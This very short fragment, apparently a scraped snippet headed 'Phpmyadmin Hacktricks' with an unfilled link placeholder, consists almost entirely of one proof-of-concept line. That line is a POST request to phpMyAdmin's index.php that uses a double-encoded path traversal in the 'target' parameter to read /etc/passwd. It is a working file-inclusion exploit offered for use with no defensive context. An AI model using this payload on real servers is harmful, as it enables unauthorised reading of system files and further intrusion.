Phpmyadmin Hacktricks ((link)) -

POC: Send a POST to index.php?target=db_datadict.php%253f../../../../../../etc/passwd